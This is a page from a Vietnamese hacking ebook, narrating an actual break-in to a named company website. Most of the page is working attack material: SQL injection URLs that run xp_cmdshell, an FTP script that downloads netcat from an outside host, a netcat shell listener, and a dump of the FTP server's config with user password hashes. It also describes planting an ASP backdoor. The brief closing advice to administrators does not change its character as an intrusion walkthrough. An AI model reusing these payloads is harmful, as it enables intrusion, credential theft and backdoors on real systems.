Tải bản đầy đủ (.pdf) (6 trang)
  1. Trang chủ
    2. >>
  2. Công Nghệ Thông Tin
    3. >>
  3. Kỹ thuật lập trình

Hacker Professional Ebook part 225 pdf

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (97.51 KB, 6 trang )

1. Shell ipconfig , rồi ghi kết quả ra table , dùng query để đọc table đó .
2. Quét các ip có cùng lớp với máy chủ Web , xem ip nào có tên máy là SERVER
3. Dùng shell upload netcat lên máy rồi nối ngược ra ngoài vào máy mình , nó sẽ
ghi Ip của nó trong quá trình connect .
4. attacker> nc -vv -l -p 53
sql injection> select * from
openrowset('sqloledb','network=dbmssocn;address=<a ttacker_ip>,53','a')
5. Nhiều lắm , tuỳ trường hợp mà dùng thôi .

Trong lần này tui sẽ dùng cách 1 cho nhanh mà đỡ bị phát hiện .

www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt-
98112972003';create table ip(id int identity,nd varchar(1000)) insert into ip exec
master xp_cmdshell 'ipconfig' sp_password

Ta vừa tạo 1 table tên là ip , và 2 trường trong đó là id và nd trong đó id là số dòng
còn nd sẽ chứa nội dung câu lệnh ipconfig . Sau đó dùng query để lấy nó ra !

www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt-98112972003'
and 1=convert(int,(select top 1 nd from ip where nd like '%25IP Address%25'))
sp_password

Nó sẽ tìm nội dung của dòng có chữ IP Address ! Và kết quả là :


Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
varchar value ' IP Address. . . . . . . . . . . . : 203.113.132.134 ' to a column of data
type int.
/thongtin/xemthongtinct.asp, line 15



Vui quá , mọi việc đều xuôn sẻ ! Tiếp theo ta upload Backdoor lên cái máy này . Ở
đây tui sẽ dùng netcat một backdoor mạnh và tiện dụng . Tôi đã upload nó sẵn trên
một server khác. Ta dùng shell sau để đưa nó về :

www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt-
98112972003';select * from openrowset('sqloledb',
'server=SERVER;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1
exec master xp_cmdshell "echo open ftp.hungrycat.org %3Eftp %26 echo user
*@hungrycat.org * %3E%3Eftp %26 echo bin %3E%3Eftp %26 echo cd www
%3E%3Eftp %26 echo cd donghe %3E%3Eftp %26 echo mget nc.exe %3E%3Eftp
%26 echo quit %3E%3Eftp"') sp_password

Lệnh trên ghi các lệnh FTP sẵn vào file tên là ftp. Nó như sau :

echo open ftp.hungrycat.org >ftp
echo user *@hungrycat.org * >>ftp
echo bin >>ftp
echo cd www >>ftp
echo cd donghe >>ftp
echo mget nc.exe >>ftp
echo quit >ftp
(* là user và password của cái host của mình ko thể tiết lộ được )

www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt-
98112972003';select * from openrowset('sqloledb',
'server=SERVER;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1
exec master xp_cmdshell "ftp -v -i -n -s%3Af %26 del f"') sp_password

Nó gồm có các lệnh :


ftp -v -i -n -s:ftp
del ftp

Để upload và xoá file FTP . Vậy là xong , ta kiểm tra kết quả xem netcat đã được
upload chưa .

www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt-
98112972003';drop table ip create table dir(id int identity,nd varchar(1000)) insert
into dir exec master xp_cmdshell 'dir nc.exe' sp_password


Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
varchar value 'x/x/2004 x:x 11,776 nc.exe' to a column of data type int.
/thongtin/xemthongtinct.asp, line 15


Ok , chạy thêm lệnh nữa để nối netcat để đổ shell về máy mình !

www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt-
98112972003';select * from openrowset('sqloledb',
'server=SERVER;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1
exec master xp_cmdshell "nc -nvv -l -d -p 8080 -e cmd.exe"') sp_password

nc -nvv -l -d -p 8080 -e cmd.exe : Lệnh này cho netcat lắng nghe và đổ shell trên
cổng 8080 của máy chủ .

Ở máy nhà ta dùng lệnh : nc -nvv 203.113.132.134 8080 để nối vào ! Nhưng ko thể
connẹct Tôi đoán là nó dùng 1 route và chỉ route những cổng cần thiết về Servẹr

Thôi cũng chả ham gì mà lấy shell . Tôi quyết định upload luôn một con backdoor
khác lên trang web này , con này viết bằng asp nên giao tiếp bằng trình duyệt vì
vậy dễ sử dụng. May mắn cho tôi là họ để chung Website với mssql! Nhưng khổ
nỗi tôi lại ko biết rõ cái website họ đặt ở đâu trong đĩa cứng? Họ rất khôn ngoan
khi hidden Directory Web.
Lúc này đành móc mớ kinh nghiệm ít ỏi. Ftp : 203.113.132.134


Ftp 203.162.7.70
Connected to 203.162.7.70.
SERVER Serv-u (Version 3.0)


Vậy là họ dùng trình Serv-u phiên bản 3.0 làm máy chủ FTP . Một FTP Server phổ
biến . Nó lưu thông tin về user và pass trong file ServUDaemon.ini ở thư mục
c:\progra~1\serv-u

www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt-
98112972003';drop table dir create table dir(id int identity,nd varchar(1000)) insert
into dir exec master xp_cmdshell 'type c:\progra~1\serv-u\ServUDaemon.ini'
sp_password

Sau đó dùng query để đọc file này :

Kết quả sau khi đọc xong file này là :

[GLOBAL]
Version=3.0.0.19
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAASgAAA+UDcD4QJwEQBUxvbmcgBkRvbmcgQQ==

OpenFilesUploadMode=Shared
PacketTimeOut=300
ProcessID=700
[DOMAINS]
Domain1=203.113.132.134||21|www.dongavn.com.vn|1
[Domain1]
User1=administrator|1|0
User2=huevb|1|0
User3=huetltk|1|0
User4=huebt|1|0
User5=backup|1|0
User6=download|1|0
User7=long|1|0
User8=hoang|1|0
[USER=administrator|1]
Password=gn2A9FE054E9836D134C7053B64F2DD958
HomeDir=d:\www
TimeOut=600
Note1="Wizard generated account"
Access1=D:\www|RWAMLCDP
[USER=huebt|1]
Password=uyD0B038CDDD3487EDD023444ED889A9D4
HomeDir=d:\www\intranet\bangtinchung\thumuc_temp
RelPaths=1
TimeOut=600
Access1=D:\www\Intranet\bangtinchung\thumuc_temp|R WAMLCDP
[USER=huetltk|1]
Password=dy622C52B31B587B8620F8183C46EAAC3C
HomeDir=d:\www\intranet\bangtin\thumuc_temp
RelPaths=1

TimeOut=600
Access1=D:\www\Intranet\bangtin\thumuc_temp|RWAMLC DP
[USER=huevb|1]
Password=kh2D5AED403D1C3F219ECB6EDCFC3DD5BE
HomeDir=d:\www\intranet\vanban\vb_tailieu
RelPaths=1
TimeOut=600
Access1=D:\www\Intranet\vanban|RWAMLCDP
[USER=backup|1]
Password=tv032D86BCD5C0FFF32C26D27DF2C389AF
HomeDir=d:\backup
RelPaths=1
TimeOut=600
Access1=D:\backup|RWAMLCDP
[USER=download|1]
Password=px4A99990818DB103405B2F7E583573556
HomeDir=d:\download
RelPaths=1
TimeOut=600
Access1=D:\download|RWAMLCDP
[USER=long|1]
Password=bnE04DCF1DAF994215DA3F21D24F6002E8
HomeDir=d:\long
RelPaths=1
TimeOut=600
Access1=D:\long|RWAMLCDP
[USER=hoang|1]
Password=nx07033609A0D318324AAE85F428083746
HomeDir=d:\www\intranet\dongahcm
RelPaths=1

TimeOut=600
Access1=D:\www\Intranet\dongahcm|RWAMLCDP

Như vậy là họ để website ở thư mục d:\www\
Ta dùng 1 lệnh nữa để upload file 4in1.asp lên d:\www\ là xong !
Dùng ie chạy : www.dongavn.com.vn/4in1.asp .

Sau đó tui download toàn bộ mã nguồn của họ về máy , xoá nc.exe , table dir ,
4in1.asp , log . Vì tôn chỉ hành động là ko phá hoại chỉ lấy mã nguồn website về để
học hỏi nên việc xâm nhập server của tui đến đây là xong !
Qua câu truyện này có vài điều muốn nói với các Administrator .

Việc đầu tiên và quan trọng nhất là hãy cập nhật các bản sửa lỗi mới nhất của các
chương trình , phiên bản Microsoft SQL Server 2000 update mới nhất đã vá nhiều
lỗi và ta ko thể enable user theo cách này nữa .
Ko đặt chung server chứa dữ liệu và CSDL , mặc dù Hacker có thể dùng server
chứa CSDL để hack Server chứa Website nhưng việc đó sẽ khó khăn hơn rất nhiều
đối với người ko chuyên nghiệp.
Xoá user BUILTIN\ADMINISTRATORS để hacker ko thể tận dụng password

Tài liệu liên quan

Tài liệu bạn tìm kiếm đã sẵn sàng tải về

Tải bản đầy đủ ngay
×